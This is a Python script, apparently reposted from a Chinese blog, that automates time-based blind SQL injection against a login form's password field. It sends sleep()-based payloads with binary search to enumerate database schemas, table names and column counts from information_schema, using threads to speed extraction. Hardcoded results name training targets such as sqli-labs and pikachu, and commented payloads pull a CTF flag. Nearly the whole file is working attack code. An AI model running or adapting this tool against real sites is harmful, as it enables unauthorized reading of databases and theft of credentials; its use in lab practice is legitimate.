import requests
import sys
import time
import pdb
import threading
from concurrent.futures import ThreadPoolExecutor
class Injection():
def __init__(self):
self.url = ""
#self.scheNum=0
self.scheNum=7
#self.scheLen = []
self.scheLen = [18, 10, 5, 5, 18, 7, 8]
#self.scheName = []
#self.scheName = ['information_schema','challenges','jf123','mysql','performance_schema','pikachu','security']
#self.scheName = [['information_schema', 40], ['challenges', 1], ['jf123', 1], ['mysql', 24], ['performance_schema', 17], ['pikachu', 5], ['security', 4]]
#self.scheName = [['information_schema', 40, 14, 10, 37, 7, 17, 7, 6, 5, 13, 16, 16, 10, 10, 7, 11, 9, 23, 8, 8, 17, 14, 17, 10, 6, 11, 17, 16, 8, 15, 5, 18, 10, 24, 17, 13, 10, 12, 19, 16, 22], ['challenges', 1, 10], ['jf123', 1, 10], ['mysql', 24, 12, 2, 5, 4, 11, 13, 12, 13, 10, 4, 16, 6, 4, 10, 12, 7, 8, 11, 9, 21, 14, 20, 25, 4], ['performance_schema', 17, 14, 20, 20, 25, 32, 40, 40, 14, 26, 24, 15, 18, 16, 15, 17, 12, 7], ['pikachu', 5, 8, 6, 7, 5, 8], ['security', 4, 6, 8, 7, 5]]
self.scheName = [['information_schema', 40, 'CHARACTER_SETS', 'COLLATIONS', 'COLLATION_CHARACTER_SET_APPLICABILITY', 'COLUMNS', 'COLUMN_PRIVILEGES', 'ENGINES', 'EVENTS', 'FILES', 'GLOBAL_STATUS', 'GLOBAL_VARIABLES', 'KEY_COLUMN_USAGE', 'PARAMETERS', 'PARTITIONS', 'PLUGINS', 'PROCESSLIST', 'PROFILING', 'REFERENTIAL_CONSTRAINTS', 'ROUTINES', 'SCHEMATA', 'SCHEMA_PRIVILEGES', 'SESSION_STATUS', 'SESSION_VARIABLES', 'STATISTICS', 'TABLES', 'TABLESPACES', 'TABLE_CONSTRAINTS', 'TABLE_PRIVILEGES', 'TRIGGERS', 'USER_PRIVILEGES', 'VIEWS', 'INNODB_BUFFER_PAGE', 'INNODB_TRX', 'INNODB_BUFFER_POOL_STATS', 'INNODB_LOCK_WAITS', 'INNODB_CMPMEM', 'INNODB_CMP', 'INNODB_LOCKS', 'INNODB_CMPMEM_RESET', 'INNODB_CMP_RESET', 'INNODB_BUFFER_PAGE_LRU'], ['challenges', 1, 'kefgu88kuc'], ['jf123', 1, 'jf_content'], ['mysql', 24, 'columns_priv', 'db', 'event', 'func', 'general_log', 'help_category', 'help_keyword', 'help_relation', 'help_topic', 'host', 'ndb_binlog_index', 'plugin', 'proc', 'procs_priv', 'proxies_priv', 'servers', 'slow_log', 'tables_priv', 'time_zone', 'time_zone_leap_second', 'time_zone_name', 'time_zone_transition', 'time_zone_transition_type', 'user'], ['performance_schema', 17, 'cond_instances', 'events_waits_current', 'events_waits_history', 'events_waits_history_long', 'events_waits_summary_by_instance', 'events_waits_summary_by_thread_by_event_', 'events_waits_summary_global_by_event_nam', 'file_instances', 'file_summary_by_event_name', 'file_summary_by_instance', 'mutex_instances', 'performance_timers', 'rwlock_instances', 'setup_consumers', 'setup_instruments', 'setup_timers', 'threads'], ['pikachu', 5, 'httpinfo', 'member', 'message', 'users', 'xssblind'], ['security', 4, 'emails', 'referers', 'uagents', 'users']]
#self.scheName = [['security', 4, 'emails', 'referers', 'uagents', 'users']]
self.headers = {
"Content-Type":"application/x-www-form-urlencoded"
}
def schemaNum(self):
high = 30
low = 1
mid = (low + high) // 2
while high > low:
payload = f"1' or if((select count(schema_name) from information_schema.schemata)>{mid},sleep(5),0)-- +" #查库名
#payload = f"1'or if(ascii(substr((seleCt(group_concat(table_name))from(information_schema.tables)where(table_schema)='note'),{i},1))>{mid},sleep(2),1)#" #查表名
#payload = f"1'or if(ascii(substr((seleCt(group_concat(column_name))from(information_schema.columns)where(table_name)='users'),{i},1))>{mid},sleep(2),1)#" #查列名
#payload = f"1'or if(ascii(substr((seleCt(flag)from(fl4g)),{i},1))>{mid},sleep(2),1)#" #查数据
data = {
"uname":"admin",
"passwd":payload,
"submit":"Submit"
}
last = int(time.time())
try:
res = requests.post(self.url, data = data)
except Exception as e:
print(e)
finally:
now = int(time.time())
if now - last >5 :
low = mid
else :
high = mid
mid = (low + high) // 2
if mid==low and high-low==1:
#print("The Number of schema is {}".format(high))
self.scheNum=high
#break
return
#print(low,mid)
self.scheNum=mid
def usage(self):
if len(sys.argv)!=2:
print('The number of parameter number not right')
print('Usage:python3 %s url '% sys.argv[0])
print("Example:python3 postInjection.py http://192.168.62.249/login.php username=admin&password=admin password")
sys.exit(-1)
self.url = sys.argv[1]
def schemataLength(self):
#pdb.set_trace()
for i in range(self.scheNum):
high = 30
low = 1
mid = (low + high) // 2
flag=0
while high > low:
#print(high,low,mid,end=" ")
payload = f"1' or if((select length(schema_name) from information_schema.schemata limit {i},1)>{mid},sleep(1),0)#" #查库名
data = {
"uname":"admin",
"passwd":payload,
"submit":"Submit"
}
last = int(time.time())
try:
res = requests.post(self.url,headers=self.headers,data = data)
except Exception as e:
print(e)
finally:
now = int(time.time())
#pdb.set_trace()
#print(now-last)
if now - last >5 :
low = mid
else :
high = mid
mid = (low + high) // 2
if mid==low and high-low==1:
self.scheLen.append(high)
flag=1
break
if flag==1:
continue
self.scheLen.append(mid)
def schemaName(self,theNumDBName,l): # n[1] is the number of databases ;n[2] is the database name length
name=""
for i in range(1,l+1):
high = 127
low = 32
mid = (low + high) // 2
flag=0
#pdb.set_trace()
while high > low:
payload = f"1' or if(ascii(substr((select schema_name from information_schema.schemata limit {theNumDBName},1),{i},1))>{mid},sleep(0.5),0);-- +" #查库名
data = {
"uname":"admin",
"passwd":payload,
"submit":"Submit"
}
last = int(time.time())
try:
res = requests.post(self.url, data = data)
except Exception as e:
print(e)
finally:
now = int(time.time())
if now - last >5 :
low = mid
else :
high = mid
mid = (low + high) // 2
#print(high,low,mid,name)
if mid==low and high-low==1:
name += chr(int(high))
flag=1
break
if flag==1:
continue
name += chr(int(low))
self.scheName.append(name)
def schethreadMan(self): #managent the multithread
t=[]
for i in range(0,len(self.scheLen)):
t.append(threading.Thread(target=self.schemaName,args=(i,self.scheLen[i])))
for i in t:
i.start()
for i in t:
i.join()
def tablesNum(self,n,scheName): #n :the number of databases ;scheName: the name of the number database
high = 40
low = 0
mid = (low + high) // 2
while high > low:
# guess the tables number of database
payload = f"1'or if((select count(table_name) from information_schema.tables where table_schema= \'{scheName}\')>{mid},sleep(0.5),0)-- +"
data = {
"uname":"admin",
"passwd":payload,
"submit":"Submit"
}
last = int(time.time())
try:
res = requests.post(self.url, data = data)
except Exception as e:
print(e)
finally:
now = int(time.time())
if now - last >5 :
low = mid
else :
high = mid
mid = (low + high) // 2
if mid==low and high-low==1:
#print("The Number of schema is {}".format(high))
print(f"the {scheName} database has {high} tables")
self.scheName[n] = [scheName,high]
#break
return
print(f"the {scheName} database has {mid} tables")
self.scheName[n] = [scheName,mid]
def tablesThreadMan(self):
t=[]
for i in range(0,len(self.scheName)):
t.append(threading.Thread(target=self.tablesNum,args=(i,self.scheName[i])))
for i in t:
i.start()
for i in t:
i.join()
def tableNameLength(self,n,scheName,l): #guess the table name length
#pdb.set_trace()
for i in range(l):
high = 40
low = 1
mid = (low + high) // 2
flag=0
while high > low:
#print(high,low,mid,end=" ")
payload = f"1' or if((select length(table_name) from information_schema.tables where table_schema='{scheName}' limit {i},1)>{mid},sleep(0.5),0)-- +"
data = {
"uname":"admin",
"passwd":payload,
"submit":"Submit"
}
last = int(time.time())
try:
res = requests.post(self.url,headers=self.headers,data = data)
except Exception as e:
print(e)
finally:
now = int(time.time())
#pdb.set_trace()
#print(now-last)
if now - last >5 :
low = mid
else :
high = mid
mid = (low + high) // 2
if mid==low and high-low==1:
self.scheName[n].append(high)
print(f"the {scheName} database the {i+1} table name length:{high}")
flag=1
break
if flag==1:
continue
self.scheName[n].append(high)
print(f"the {scheName} database the {i+1} table name length:{mid}")
def tableNameLengthThreadMan(self):
t=[]
#t.append(threading.Thread(target=self.tableNameLength,args=(0,self.scheName[0][0],self.scheName[0][1])))
#t[0].start()
#t[0].join()
for i in range(0,len(self.scheName)):
t.append(threading.Thread(target=self.tableNameLength,args=(i,self.scheName[i][0],self.scheName[i][1])))
for i in t:
i.start()
for i in t:
i.join()
def tableName(self,n1,scheName,l,n2): # n1:the number of database; scheName :schema name ;l :the table length ;n2: the number of table
name=""
for i in range(1,l+1):
high = 127
low = 32
mid = (low + high) // 2
flag=0
#pdb.set_trace()
while high > low:
#guess the table name
payload = f"1' or if(ascii(substr((select table_name from information_schema.tables where table_schema = \'{scheName}\' limit {n2-2},1),{i},1))>{mid},sleep(0.5),1);-- +"
data = {
"uname":"admin",
"passwd":payload,
"submit":"Submit"
}
last = int(time.time())
try:
res = requests.post(self.url, data = data)
except Exception as e:
print(e)
finally:
now = int(time.time())
if now - last > 5 :
low = mid
else :
high = mid
mid = (low + high) // 2
#print(high,low,mid,name)
if mid == low and high - low == 1:
name += chr(int(high))
flag = 1
break
if flag==1:
continue
name += chr(int(low))
self.scheName[n1][n2] = name
print(f"the {scheName} database {n2-1} table name is:{name}")
def tableNameThreadMan(self):
thread_pool = ThreadPoolExecutor(max_workers = 30) # max_workers指定了复用线程的最大数量
for i in range(len(self.scheName)):
for j in range(2,len(self.scheName[i])):
future = thread_pool.submit(self.tableName,i,self.scheName[i][0],self.scheName[i][j],j)
#future = thread_pool.submit(self.tableName,0,self.scheName[0][0],self.scheName[0][2],2)
thread_pool.shutdown(wait=True)
def columnsNum(self,scheName,tableName): #scheName: the name of the number database ;tableName:the table name
high = 40
low = 0
if not hasattr(str(scheName)+"_"+str(tableName),""): #增加类属性,定义每个表都为类属性。结构为list,第一个值为表所拥有的字段数
setattr(self.__class__,str(scheName)+"_"+str(tableName),[])
mid = (low + high) // 2
#pdb.set_trace()
while high > low:
# guess the colnmns number of table
payload = f"1' or if((select count(table_name) from information_schema.columns where table_schema = \'{scheName}\' and table_name = \'{tableName}\') >{mid},sleep(0.5),0) -- +"
data = {
"uname":"admin",
"passwd":payload,
"submit":"Submit"
}
last = int(time.time())
try:
res = requests.post(self.url, data = data)
except Exception as e:
print(e)
finally:
now = int(time.time())
if now - last >5 :
low = mid
else :
high = mid
mid = (low + high) // 2
#pdb.set_trace()
if mid==low and high-low==1:
print(f"the {scheName} database {tableName} tables has {high} colnmns")
#setattr(self.__class__,str(scheName)+"_"+str(tableName),((getattr(self.__class__,str(scheName)+"_"+str(tableName))).append(high)))
temp = getattr(self.__class__,str(scheName)+"_"+str(tableName)) #查询对应表类属性的值
temp.append(high) #将表所拥有字段数添加到对应类属性
setattr(self.__class__,str(scheName)+"_"+str(tableName),temp) #重置类属性的值
#print(f"self.{scheName}_{tableName} = ",getattr(self.__class__,str(scheName)+"_"+str(tableName)))
return
print(f"the {scheName} database {tableName} tables has {high} colnmns")
temp = getattr(self.__class__,str(scheName)+"_"+str(tableName))
temp.append(high)
setattr(self.__class__,str(scheName)+"_"+str(tableName),temp)
#print(f"self.{scheName}_{tableName} = ",getattr(self.__class__,str(scheName)+"_"+str(tableName)))
def columnsNumThreadMan(self):
#pdb.set_trace()
thread_pool = ThreadPoolExecutor(max_workers = 30) # max_workers指定了复用线程的最大数量,开启线程池
for i in range(len(self.scheName)):
for j in range(2,len(self.scheName[i])):
future = thread_pool.submit(self.columnsNum,self.scheName[i][0],self.scheName[i][j]) #self.scheName[i][0]为数据库名,self.scheName[i][j]为表名
thread_pool.shutdown(wait=True) #关闭线程池
if __name__ == '__main__':
# pdb.set_trace()
inject = Injection()
inject.usage()
#inject.schemataLength()
#inject.schethreadMan()
#inject.schemataNum()
#print(inject.scheNum)
#inject.tablesThreadMan()
#inject.tableNameThreadMan()
#print(inject.scheName)
inject.columnsNumThreadMan()
标签:name,--,scheName,段数,mid,high,low,post,self From: https://www.cnblogs.com/xiaoliyulixianji/p/17608316.html